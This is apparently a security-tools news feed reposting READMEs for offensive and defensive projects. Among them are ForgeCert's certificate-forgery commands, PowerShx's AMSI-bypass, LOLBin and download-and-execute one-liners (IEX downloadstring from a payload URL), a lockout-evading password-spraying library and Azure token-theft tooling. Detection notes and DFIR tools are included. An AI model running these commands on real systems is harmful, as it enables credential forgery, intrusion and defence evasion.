ForgeCert - "Golden" Certificates

14 October 2021 at 20:30
By: Unknown


ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.

This attack is codified as DPERSIST1 in our "Certified Pre-Owned" whitepaper. This code base was released ~45 days after the whitepaper was published.

@tifkin_ is the primary author of ForgeCert.

@tifkin_ and @harmj0y are the primary authors of the associated Active Directory Certificate Service research (blog and whitepaper).


Background

As described in the Background and Forging Certificates with Stolen CA Certificates - DPERSIST1 sections of our whitepaper, the private key for a Certificate Authority's CA certificate is protected on the CA server either via DPAPI or hardware (HSM/TPM). Additionally, the certificate (sans private key) is published to the NTAuthCertificates forest object, which defines CA certificates that enable authentication to AD. Put together, a CA whose certificate is present in NTAuthCertificates uses its private key to sign certificate signing requests (CSRs) from requesting clients. This graphic summarizes the process:

The security of the CA's private key is paramount. As mentioned, if the private key is not protected by a hardware solution like a TPM or a HSM, the key will be encrypted with the Data Protection API (DPAPI) and stored on disk on the CA server. If an attacker is able to compromise a CA server, they can extract the private key for any CA certificate not protected by hardware by using @gentilkiwi's Mimikatz or GhostPack's SharpDPAPI project. THEFT3 in the whitepaper describes this process for machine certificates.

Because the only key material used to sign issued certificates is the CA's private key, if an attacker steals such a key (for a certificate in NTAuthCertificates) they can forge certificates capable of domain authentication. These forged certificates can be for any principal in the domain (though the account needs to be "active" for authentication to be possible, so accounts like krbtgt will not work) and the certificates will be valid for as long as the CA certificate is valid (usually 5 years by default but can be set to be longer).

Also, as these certificates are not a product of the normal issuance process, the CA is not aware that they were created. Thus, the certificates cannot be revoked.

Note: the private key for ANY CA certificate in NTAuthCertificates (root or subordinate CA) can be used to forge certificates capable of authentication in the forest. If the certificate/key is from a subordinate CA, a legitimate CRL for verification of the certificate chain must be supplied.

ForgeCert uses the BouncyCastle's X509V3CertificateGenerator to perform the forgeries.


Command Line Usage
C:\Temp>ForgeCert.exe
ForgeCert 1.0.0.0
Copyright c 2021

ERROR(S):
Required option 'CaCertPath' is missing.
Required option 'SubjectAltName' is missing.
Required option 'NewCertPath' is missing.
Required option 'NewCertPassword' is missing.

--CaCertPath Required. CA private key as a .pfx or .p12 file

--CaCertPassword Password to the CA private key file

--Subject (Default: CN=User) Subject name in the certificate

--SubjectAltName Required. UPN of the user to authenticate as

--NewCertPath Required. Path where to save the new .pfx certificate

--NewCertPassword Required. Password to the .pfx file

--CRL ldap path to a CRL for the forged certificate

--help Display this help screen.

--version Display version information.


Usage

Note: for a complete walkthrough of stealing a CA private key and forging auth certs, see DPERSIST1 in the whitepaper.

Context:

  • The stolen CA's certificate is ca.pfx, encrypted with a password of Password123!
  • The subject is arbitrary since we're specifying a subject alternative name for the certificate.
  • The subject alternative name (i.e., the user we're forging a certificate for), is [email protected].
  • The forged certificate will be saved as localadmin.pfx, encrypted with the password NewPassword123!
C:\Tools\ForgeCert>ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "Password123!" --Subject "CN=User" --SubjectAltName "[email protected]" --NewCertPath localadmin.pfx --NewCertPassword "NewPassword123!"
CA Certificate Information:
Subject: CN=theshire-DC-CA, DC=theshire, DC=local
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 1/4/2021 10:48:02 AM
End Date: 1/4/2026 10:58:02 AM
Thumbprint: 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
Serial: 14BFC25F2B6EEDA94404D5A5B0F33E21

Forged Certificate Information:
Subject: CN=User
SubjectAltName: [email protected]
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 7/26/2021 3:38:45 PM
End Date: 7/26/2022 3:38:45 PM
Thumbprint: C5789A24E91A40819EFF7CFD77150595F8B9878D
Serial: 3627A48F90F6869C3215FF05BC3B2E42

Done. Save d forged certificate to localadmin.pfx with the password 'NewPassword123!'

This forgery can be done on an attacker-controlled system, and the resulting certificate can be used with Rubeus to request a TGT (and/or retrieve the user's NTLM ;)


Defensive Considerations

The TypeRefHash of the current ForgeCert codebase is b26b451ff2c947ae5904f962e56facbb45269995fbb813070386472f307cfcf0.

The TypeLib GUID of ForgeCert is bd346689-8ee6-40b3-858b-4ed94f08d40a. This is reflected in the Yara rules currently in this repo.

See PREVENT1, DETECT3, and DETECT5 in our whitepaper for prevention and detection guidance.

Fabian Bader published a great post on how to mitigate many uses of "Golden Certificates" through OSCP tweaks. Note thought that in the Final Thoughts section he mentions This method is not bulletproof at all. Since the attacker is in charge of the certificate creation process, she could just change the serial number to a valid one. This was implemented in his PR, though remember that by default the serial number will be randomized, meaning the OSCP prevention should work in many cases and is worth implementing in our opinion.

We believe there may opportunities to build Yara/other detection rules for types of forged certificates this project produces - if any defensive researchers find a good way to signature these files, please let us know and we will update the Yara rules/defensive guidance here.


Reflections

There is a clear parallel between "Golden Tickets" (forged TGTs) and these "Golden Certificates" (forced AD CS certs). Both the krbtgt hash and CA private key are cryptographic material critical to the security of an Active Directory environment, and both can be used to forge authenticators for arbitrary users. However, while the krbtgt hash can be retrieved remotely over DCSync, a CA private key must (at least as far as we know) be recovered through code execution on the CA machine itself. While a krbtgt hash can be rotated relatively easily, rotating a CA private key is significantly more difficult.

On the subject of public disclosure, we self-embargoed the release of our offensive tooling (ForgeCert as well as Certify) for ~45 days after we published our whitepaper in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. However, we have found that organizations and vendors have historically often not fixed issues or built detections for "theoretical" attacks until someone proves something is possible with a proof of concept.

This is reflected in some people's reaction to the research of this IS StUPId, oF COurse YoU Can FORge CERts WITH ThE ca PriVAtE KeY. To which we state, yes, many things are possible, but PoC||GTFO



Xmap - A Fast Network Scanner Designed For Performing Internet-wide IPv6 &Amp; IPv4 Network Research Scanning

14 October 2021 at 11:30
By: Zion3R


XMap is a fast network scanner designed for performing Internet-wide IPv6 & IPv4 network research scanning.

XMap is reimplemented and improved thoroughly from ZMap and is fully compatible with ZMap, armed with the "5 minutes" probing speed and novel scanning techniques. XMap is capable of scanning the 32-bits address space in under 45 minutes. With a 10 gigE connection and PF_RING, XMap can scan the 32-bits address space in under 5 minutes. Moreover, leveraging the novel IPv6 scanning approach, XMap can discover the IPv6 Network Periphery fast. Furthermore, XMap can scan the network space randomly with any length and at any position, such as 2001:db8::/32-64 and 192.168.0.1/16-20. Besides, XMap can probe multiple ports simultaneously.

XMap operates on GNU/Linux, Mac OS, and BSD. XMap currently has implemented probe modules for ICMP Echo scans, TCP SYN scans, and UDP probes.

With banner grab and TLS handshake tool, ZGrab2, more involved scans could be performed.


Installation

The latest stable release of XMap is version 1.0.0 and supports Linux, macOS, and BSD. We recommend installing XMap from HEAD rather than using a distro package manager (not supported yet).

Instructions on building XMap from source can be found in INSTALL.


Usage

A guide to using XMap can be found in our GitHub Wiki.

Simple commands and options to using XMap can be found in USAGE.


Paper

Fast IPv6 Network Periphery Discovery and Security Implications.

Abstract. Numerous measurement researches have been performed to discover the IPv4 network security issues by leveraging the fast Internet-wide scanning techniques. However, IPv6 brings the 128-bits address space and renders brute-force network scanning impractical. Although significant efforts have been dedicated to enumerating active IPv6 hosts, limited by technique efficiency and probing accuracy, large-scale empirical measurement studies under the increasing IPv6 networks are infeasible now.

To fill this research gap, by leveraging the extensively adopted IPv6 address allocation strategy, we propose a novel IPv6 network periphery discovery approach. Specifically, XMap, a fast network scanner, is developed to find the periphery, such as a home router. We evaluate it on twelve prominent Internet service providers and harvest 52M active peripheries. Grounded on these found devices, we explore IPv6 network risks of the unintended exposed security services and the flawed traffic routing strategies. First, we demonstrate the unintended exposed security services in IPv6 networks, such as DNS, and HTTP, have become emerging security risks by analyzing 4.7M peripheries. Second, by inspecting the peripheryโ€™s packet routing strategies, we present the flawed implementations of IPv6 routing protocol affecting 5.8M router devices. Attackers can exploit this common vulnerability to conduct effective routing loop attacks, inducing DoS to the ISPโ€™s and home routers with an amplification factor of >200. We responsibly disclose those issues to all involved vendors and ASes and discuss mitigation solutions. Our research results indicate that the security community should revisit IPv6 network strategies immediately.

Authors. Xiang Li, Baojun Liu, Xiaofeng Zheng, Haixin Duan, Qi Li, Youjun Huang.

Conference. Proceedings of the 2021 IEEE/IFIP International Conference on Dependable Systems and Networks (DSN '21)

Paper. [PDF], [Slides] and [Video].

CNVD/CVE. [Lists].


License and Copyright

XMap Copyright 2021 Xiang Li from Network and Information Security Lab Tsinghua University

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See LICENSE for the specific language governing permissions and limitations under the License.



PowerShx - Run Powershell Without Software Restrictions

13 October 2021 at 20:30
By: Zion3R


Unmanaged PowerShell execution using DLLs or a standalone executable.


Introduction

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.


Features
  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32
rundll32 PowerShx.dll,main -e                           <PS script to run>
rundll32 PowerShx.dll,main -f <path> Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):
1. 
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
4.
regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

.exe version
PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <path> Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded payloads

Payloads can be embedded by updating the data dictionary "Common.Payloads.PayloadDict" in the "Common" project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict["amsi"]);
}

Examples

Run a base64 encoded script
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode


Run a base64 encoded script
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

Requirements

.NET 4


Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interractive mode and command output rely on hijacking the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.



Rdesktop - Open Source Client for Microsoft's RDP protocol

13 October 2021 at 11:30
By: Zion3R


rdesktop is an open source client for Microsoft's RDP protocol. It is known to work with Windows versions ranging from NT 4 Terminal Server to Windows 2012 R2 RDS. rdesktop currently has implemented the RDP version 4 and 5 protocols.


Installation

rdesktop uses a GNU-style build procedure. Typically all that is necessary to install rdesktop is the following:

% ./configure
% make
% make install

The default is to install under /usr/local. This can be changed by adding --prefix=<directory> to the configure line.

The smart-card support module uses PCSC-lite. You should use PCSC-lite 1.2.9 or later. To enable smart-card support in the rdesktop add --enable-smartcard to the configure line.


Note for users building from source

If you have retrieved a snapshot of the rdesktop source, you will first need to run ./bootstrap in order to generate the build infrastructure. This is not necessary for release versions of rdesktop.


Usage

Connect to an RDP server with:

% rdesktop server

where server is the name of the Terminal Services machine. If you receive "Connection refused", this probably means that the server does not have Terminal Services enabled, or there is a firewall blocking access.

You can also specify a number of options on the command line. These are listed in the rdesktop manual page (run man rdesktop).



Shisho - Lightweight Static Analyzer For Several Programming Languages

12 October 2021 at 20:30
By: Zion3R


Shisho is a lightweight static analyzer for developers.


Please see the usage documentation for further information.



Try at Playground

You can try Shisho at our playground.


Try with Docker

You can try shisho in your machine as follows:

echo "func test(v []string) int { return len(v) + 1; }" | docker run -i ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go
echo "func test(v []string) int { return len(v) + 1; }" > file.go
docker run -i -v $(PWD):/workspace ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go /workspace/file.go

Install with pre-built binaries

When you'd like to run shisho outside docker containers, please follow the instructions below:


Linux / macOS

Run the following command(s):

# Linux
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-unknown-linux-gnu.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

# macOS
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-apple-darwin.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

Then you'll see a shisho's executable in /usr/local/bin.


Windows

Download the prebuild binary from releases and put it into your %PATH% directory.

If you're using Windows Subsystem for Linux, you can install shisho with the above instructions.


More


LinuxCatScale - Incident Response Collection And Processing Scripts With Automated Reporting Scripts

12 October 2021 at 11:30
By: Zion3R


Linux CatScale is a bash script that uses live of the land tools to collect extensive data from Linux based hosts. The data aims to help DFIR professionals triage and scope incidents. An Elk Stack instance also is configured to consume the output and assist the analysis process.


Usage

This scripts were built to automate as much as possible. We recommend running it from an external device/usb to avoid overwriting evidence. Just in case you need a full image in future.

Please run the collection script on suspected hosts with sudo rights. fsecure_incident-response_linux_collector_0.7.sh the only file you need to run the collection.

[email protected]:<dir>$ chmod +x ./Cat-Scale.sh
[email protected]:<dir>$ sudo ./Cat-Scale.sh

The script will create a directory called "FSecure-out" in the working directory and should remove all artefacts after being compressed. This will leave a filename in the format of FSecure_Hostname-YYMMDD-HHMM.tar.gz

Once these are all aggregated and you have the FSecure_Hostname-YYMMDD-HHMM.tar.gz on the analysis machine. You can run Extract-Cat-Scale.sh which will extract all the files and place them in a folder called "extracted".

[email protected]:<dir>$ chmod +x ./Extract-Cat-Scale.sh
[email protected]:<dir>$ sudo ./Extract-Cat-Scale.sh

Parsing

This project has predefined grok filters to ingest data into elastic, feel free to modify them as you need.


What does it collect?

This script will procude the following files/folders which can be reviewed as text files or using Elk Stack.

Resolver configuration file resolv.conf executables-list.txt - All ELF files on disk with +x attribute group.txt - List of groups and the members belonging to each group home-dir-timeline - Timeline of all files in /home/* host.conf.txt - Resolver configuration file host.conf hosts.allow.txt - Host access control file hosts.allow hosts.deny.txt - Host access control file hosts.deny hosts.txt - Static table lookup for hostnames /etc/hosts ifconfig.txt - ifconfig -a Output iptables.txt - Tables of IPv4 and IPv6 packet filter rules in the Linux kernel. lastbad.txt - Records failed login attempts lastlog.txt - The most recent login of all users or of a given user last.txt - History of all logins and logouts lsmod.txt - Kernel modules are currently loaded lsof-processes.txt - List of all open files and the processes that opened them. lsusb.txt - Attached USB device info md5-ps.txt - ps command bin md5 meminfo.txt - Memory info netstat-ano.txt - Listing All Sockets, in numeric form with timer info netstat-antup.txt - All tcp/udp connection in numeric form with process ID netstat-list.txt - All tcp/udp connection in numeric form with process ID without headers num-proc.txt - number of processes according to ps command num-ps.txt - number of processes according to /proc directory package-list.txt - All files in all rpm packages packages-result.txt - all executables that are not part of rpm packages passwd.txt - Copy of the passwd file persistence-anacron.txt - All Anacron jobs persistence-cronlist.txt - All Cron jobs persistence-initd.txt - All initd scripts persistence-profiled.txt - Scripts that run when User logs in persistence-rc-scripts.txt - All rc scripts. (run level scipts) persistence-shellrc-etc.txt - All startup script contents in /etc/ persistence-shellrc-home.txt - All startup script contents in /home/ persistence-shellrc-root.txt - All startup script contents in /root/ persistence-systemdlist.txt - All systemd services and execution commandlines process-details.txt - All running process details and status information processes-list.txt - All running process acording to ps processes.txt - All running process acording to /proc/ directory processhashes.txt - Hash of all running processes procmod.txt - Loaded modules for all processes release.txt - OS information routetable.txt - Contents of kernel routing table. route command output sbin-dir-timeline - Timeline of all files in /sbin/* service_status.txt - All running service and their status. ssh_config.txt - ssh service config file sshd_config.txt - ssh service config file sudoers.txt - List of sudoers tmp-dir-timeline - Timeline of all files in /tmp/* tmp-executable-files-for-diff.txt - tmp-executable-files.txt without executable type metadata for later diff operation with packages tmp-executable-files.txt - All files with +x attributes (executables) tmp-types.txt - tmp file for Find types of executable(script\|ELF\|executable) var-www-dir-timeline - Timeline of all files in /var/www/* whoandwhat.txt - w command output. Who is logged on and what they are doing. who.txt - List of users who are currently logged in wtmp-lastlog.txt - wtmp last log varlogs - All contents of /var/log viminfo - All viminfo files... Can contain vi historic commands ">
bash_history                    - Bash history for all users
bash_profile - Bash profile file for all users
bash_rc - Bash_rc file
full-timeline.csv - Timeline of all files in the following directories: /home/* + var/www/* + /tmp/ + /dev/shm/ + /bin + /sbin
bin-dir-timeline - Timeline of all files in /bin
binhashes.txt - Hash of all executable files under $PATH variable
btmp-lastlog.txt - btmp last log
console-error-log.txt - This were all the errors from the script is forwarded to
cpuinfo.txt - CPU info
dev-shm-dir-timeline - Timeline of all files in /dev/shm/
df.txt - Information about the file system on which each FILE resides,or all file systems by default.
dhcp.txt - Resolver configuration file resolv.conf
executables-list.tx t - All ELF files on disk with +x attribute
group.txt - List of groups and the members belonging to each group
home-dir-timeline - Timeline of all files in /home/*
host.conf.txt - Resolver configuration file host.conf
hosts.allow.txt - Host access control file hosts.allow
hosts.deny.txt - Host access control file hosts.deny
hosts.txt - Static table lookup for hostnames /etc/hosts
ifconfig.txt - ifconfig -a Output
iptables.txt - Tables of IPv4 and IPv6 packet filter rules in the Linux kernel.
lastbad.txt - Records failed login attempts
lastlog.txt - The most recent login of all users or of a given user
last.txt - History of all logins and logouts
lsmod.txt - Kernel modules are currently loaded
lsof-processes.txt - List of all open files and the processes that opened them.
lsusb.txt - Attached USB device info
md5-ps.txt - ps command bin md5
meminfo.txt - Memory info
netstat-ano.txt - Listing All Sockets, in numeric form with timer info
netstat-antup.txt - All tcp/udp connection in numeric form with process ID
netstat-list.txt - All tcp/udp connection in numeric form with process ID without headers
num-proc.txt - number of processes according to ps command
num-ps.txt - number of processes according to /proc directory
package-list.txt - All files in all rpm packages
packages-result.txt - all executables that are not part of rpm packages
passwd.txt - Copy of the passwd file
persistence-anacron.txt - All Anacron jobs
persistence-cronlist.txt - All Cron jobs
persistence-initd.txt - All initd scripts
persistence-profiled.txt - Scripts that run when User logs in
persistence-rc-scripts.txt - All rc scripts. (run level scipts)
persistence-shellrc-etc.txt - All startup script contents in /etc/
persistence-shellrc-home.txt - All startup script contents in /home/
persistence-shellrc-root.txt - All startup script contents in /root/
persistence-systemdlist.txt - All systemd services and execution commandlines
process-details.txt - All running process details and status information
processes-list.txt - All running process acording to ps
processes.txt - All running process acording to /proc/ directory
processhashes.txt - Hash of all running processes
procmod.txt - Loaded modules for all processes
release.txt - OS information
routetable.txt - Contents of kernel routing table. route command output
sbin-dir-timeline - Timeline of all files in /sbin/*
service_status.txt - All running service and their status.
ssh_config.txt - ssh service config file
sshd_config.txt - ssh service config file
sudoers.txt - List of sudoers
tmp-dir-timeline - Timeline of all files in /tmp/*
tmp-executable-files-for-diff.txt - tmp-executable-files.txt without executable type metadata for later diff operation with packages
tmp-executable-files.txt - All files with +x attributes (executables)
tmp-types.txt - tmp file for Find types of executable(script\|ELF\|executable)
var-www-dir-timeline - Timeline of all files in /var/www/*
whoandwhat.txt - w command output. Who is logged on and what they are doing.
who.txt - List of users who are currently logged in
wtmp-lastlog.txt - wtmp last log
varlogs - All contents of /var/log
viminfo - All viminfo files... Can contain vi historic commands

Disclaimer

Note that the script will likely alter artefacts on endpoints. Care should be taken when using the script. This is not meant to take forensically sound disk images of the remote endpoints.


Tested OSes
  • Ubuntu 16.4
  • Centos
  • Mint
  • Solaris 11.4


Azur3Alph4 - A PowerShell Module That Automates Red-Team Tasks For Ops On Objective

11 October 2021 at 20:30
By: Zion3R


Azur3Alph4 is a PowerShell module that automates red-team tasks for ops on objective. This module situates in a post-breach (RCE achieved) position. Token extraction and many other tools will not execute successfully without starting in this position. This module should be used for further enumeration and movement in a compromised app that is part of a managed identity.
Azur3Alph4 is currently in development. Modules are being worked on and updated. Most of this is still untested.

Scripts are in repo for individual use and easy identification, but the .psm1 file is what will be consistently updated.


Installation & Usage

Import-Module Azur3Alph4

Point the $envendpoint to cmd execution passing "env" to the Azure backend.


Updates - 8/10/2021
  • Added Get-ResourceActions.ps1 and updated Azur3Alph4.psm1

Updates - 8/5/2021
  • Made Azur3Alph4 modular
  • Added Get-SubscriptionId function

Why This Was Built
  • I built this because I wanted to learn more about both PowerShell and Azure, two things I'd definitely like to get better at.
  • To help automate and eliminate a lot of repetitive PS commands.
  • To build off my current knowledge of Azure red teaming

Function List

Get-Endpoint

Enumerates an Azure endpoint to verify whether or not it belongs to a managed identity


Get-ManagedIdentityToken

Grabs the Managed Identity Token from the endpoint using the extracted secret. Stores the value in a given variable


Connect-AzAccount

Takes a username and password variable and automates SecureString conversion and connects to an Azure account


Get-SubscriptionId

Gets the subscription ID using the REST API for Azure


Get-ManagedIdentityResources

Uses the subscription ID to enumerate all resources that are accessible


Get-ResourceActions.ps1

Enumerates all resources available using Azure token and lists permissions of each resource directly below it


Credits
  • Big shout out to @nikhil_mitt for the CARTP course that got me started in Azure


BruteLoops - Protocol Agnostic Online Password Guessing API

11 October 2021 at 11:30
By: Zion3R


A dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaces.

See various Wiki sections for more information.

A "modular" example is included with the library that demonstrates how to use this package. It's fully functional and provides multiple brute force modules. Below is a sample of its capabilities:


authentication module for training/testing ">
http.accellion_ftp  Accellion FTP HTTP interface login module
http.basic_digest Generic HTTP basic digest auth
http.basic_ntlm Generic HTTP basic NTLM authentication
http.global_protect
Global Protect web interface
http.mattermost Mattermost login web interface
http.netwrix Netwrix web login
http.okta Okta JSON API
http.owa2010 OWA 2010 web interface
http.owa2016 OWA 2016 web interface
smb.smb Target a single SMB server
testing.fake Fake authentication module for training/testing

Key Features
  • Protocol agnostic - If a callback can be written in Python, BruteLoops can be used to attack it
  • SQLite support - All usernames, passwords, and credentials are maintained in an SQLite database.
    • A companion utility (dbmanager.py) that creates and manages input databases accompanies BruteLoops
  • Spray and Stuffing Attacks in One Tool - BruteLoops supports both spray and stuffing attacks in the same attack logic and database, meaning that you can configure a single database and run the attack without heavy reconfiguration and confusion.
  • Guess scheduling - Each username in the SQLite database is configured with a timestamp that is updated after each authentication event. This means we can significantly reduce likelihood of locking accounts by scheduling each authentication event with precision.
  • Fine-grained configurability to avoid lockout events - Microsoft's lockout policies can be matched 1-to-1 using BruteLoop's parameters:
    • auth_threshold = Lockout Threshold
    • max_auth_jitter = Lockout Observation Window
    • Timestampes associated with each authentication event are tracked in BruteLoops' SQLite database. Each username receives a distinct timestamp to assure that authentication events are highly controlled.
  • Attack resumption - Stopping and resuming an attack is possible without worrying about losing your place in the attack or locking accounts.
  • Multiprocessing - Speed up attacks using multiprocessing! By configuring the`parallel guess count, you're effectively telling BruteLoops how many usernames to guess in parallel.
  • Logging - Each authentication event can optionally logged to disk. This information can be useful during red teams by providing customers with a detailed attack timeline that can be mapped back to logged events.

Dependencies

BruteLoops requires Python3.7 or newer and SQLAlchemy 1.3.0, the latter of which can be obtained via pip and the requirements.txt file in this repository: python3.7 -m pip install -r requirements.txt


Installation
git clone https://github.com/arch4ngel/bruteloops
cd bruteloops
python3 -m pip install -r requirements.txt

How do I use this Damn Thing?

Jeez, alright already...we can break an attack down into a few steps:

  1. Find an attackable service
  2. If one isn't already available in the example.py[1] directory, build a callback
  3. Find some usernames, passwords, and credentials
  4. Construct a database by passing the authentication data to dbmanager.py[2]
  5. If relevant, Enumerate or request the AD lockout policy to intelligently configure the attack
  6. Execute the attack in alignment with the target lockout policy[1][3][4]


FUSE - A Penetration Testing Tool For Finding File Upload Bugs

10 October 2021 at 20:30
By: Zion3R


FUSE is a penetration testing system designed to identify Unrestricted Executable File Upload (UEFU) vulnerabilities. The details of the testing strategy is in our paper, "FUSE: Finding File Upload Bugs via Penetration Testing", which appeared in NDSS 2020. To see how to configure and execute FUSE, see the followings.


Setup

Install

FUSE currently works on Ubuntu 18.04 and Python 2.7.15.

  1. Install dependencies
# apt-get install rabbitmq-server
# apt-get install python-pip
# apt-get install git
  1. Clone and build FUSE
$ git clone https://github.com/WSP-LAB/FUSE
$ cd FUSE && pip install -r requirements.txt
  • If you plan to leverage headless browser verification using selenium, please install Chrome and Firefox web driver by refering selenium document.

Usage

Configuration
  • FUSE uses a user-provided configuration file that specifies parameters for a target PHP application. The script must be filled out before testing a target Web application. You can check out README file and example configuration files.

  • Configuration for File Monitor (Optional)

$ vim filemonitor.py

...
10 MONITOR_PATH='/var/www/html/' <- Web root of the target application
11 MONITOR_PORT=20174 <- Default port of File Monitor
12 EVENT_LIST_LIMITATION=8000 <- Maxium number of elements in EVENT_LIST
...

Execution
  • FUSE
$ python framework.py [Path of configuration file]
  • File Monitor
$ python filemonitor.py
  • Result
    • When FUSE completes the penetration testing, a [HOST] directory and a [HOST_report.txt] file are created.
    • A [HOST] folder stores files that have been attempted to upload.
    • A [HOST_report.txt] file contains test results and information related to files that trigger U(E)FU.

CVEs

If you find UFU and UEFU bugs and get CVEs by running FUSE, please send a PR for README.md

Application CVEs
Elgg CVE-2018-19172
ECCube3 CVE-2018-18637
CMSMadeSimple CVE-2018-19419, CVE-2018-18574
CMSimple CVE-2018-19062
Concrete5 CVE-2018-19146
GetSimpleCMS CVE-2018-19420, CVE-2018-19421
Subrion CVE-2018-19422
OsCommerce2 CVE-2018-18572, CVE-2018-18964, CVE-2018-18965, CVE-2018-18966
Monstra CVE-2018-6383, CVE-2018-18694
XE XEVE-2019-001

Author

This research project has been conducted by WSP Lab at KAIST.


Citing FUSE

To cite our paper:

Distributed System Security Symposium}, year = 2020 } ">
@INPROCEEDINGS{lee:ndss:2020,
author = {Taekjin Lee and Seongil Wi and Suyoung Lee and Sooel Son},
title = {{FUSE}: Finding File Upload Bugs via Penetration Testing},
booktitle = {Proceedings of the Network and Distributed System Security Symposium},
year = 2020
}


Qu1cksc0pe - All-in-One Static Malware Analysis Tool

10 October 2021 at 11:30
By: Zion3R


This tool allows you to statically analyze Windows, Linux, OSX executables and APK files.

You can get:

  • What DLL files are used.
  • Functions and APIs.
  • Sections and segments.
  • URLs, IP addresses and emails.
  • Android permissions.
  • File extensions and their names.
    And so on...

Qu1cksc0pe aims to get even more information about suspicious files and helps user realize what that file is capable of.


Usage
python3 qu1cksc0pe.py --file suspicious_file --analyze

Setup

Necessary python modules:

  • puremagic => Analyzing target OS and magic numbers.
  • androguard => Analyzing APK files.
  • apkid => Check for Obfuscators, Anti-Disassembly, Anti-VM and Anti-Debug.
  • prettytable => Pretty outputs.
  • tqdm => Progressbar animation.
  • colorama => Colored outputs.
  • oletools => Analyzing VBA Macros.
  • pefile => Gathering all information from PE files.
  • quark-engine => Extracting IP addresses and URLs from APK files.
  • pyaxmlparser => Gathering informations from target APK files.
  • yara-python => Android library scanning with Yara rules.
  • prompt_toolkit => Interactive shell.


Installation of python modules: pip3 install -r requirements.txt
Gathering other dependencies:

  • VirusTotal API Key: https://virustotal.com
  • Binutils: sudo apt-get install binutils
  • ExifTool: sudo apt-get install exiftool
  • Strings: sudo apt-get install strings

Alert

You must specify jadx binary path in Systems/Android/libScanner.conf

[Rule_PATH]
rulepath = /Systems/Android/YaraRules/

[Decompiler]
decompiler = JADX_BINARY_PATH <-- You must specify this.

Installation
  • You can install Qu1cksc0pe easily on your system. Just execute the following command.
    Command 0: sudo pip3 install -r requirements.txt
    Command 1: sudo python3 qu1cksc0pe.py --install

Scan arguments

Normal analysis

Usage: python3 qu1cksc0pe.py --file suspicious_file --analyze


Multiple analysis

Usage: python3 qu1cksc0pe.py --multiple FILE1 FILE2 ...


Hash scan

Usage: python3 qu1cksc0pe.py --file suspicious_file --hashscan


Folder scan

Supported Arguments:

  • --hashscan
  • --packer

Usage: python3 qu1cksc0pe.py --folder FOLDER --hashscan




VirusTotal

Report Contents:

  • Threat Categories
  • Detections
  • CrowdSourced IDS Reports

Usage for --vtFile: python3 qu1cksc0pe.py --file suspicious_file --vtFile




Document scan

Usage: python3 qu1cksc0pe.py --file suspicious_document --docs



Programming language detection

Usage: python3 qu1cksc0pe.py --file suspicious_executable --lang




Interactive shell

Usage: python3 qu1cksc0pe.py --console



Domain

Usage: python3 qu1cksc0pe.py --file suspicious_file --domain


Informations about categories

Registry

This category contains functions and strings about:

  • Creating or destroying registry keys.
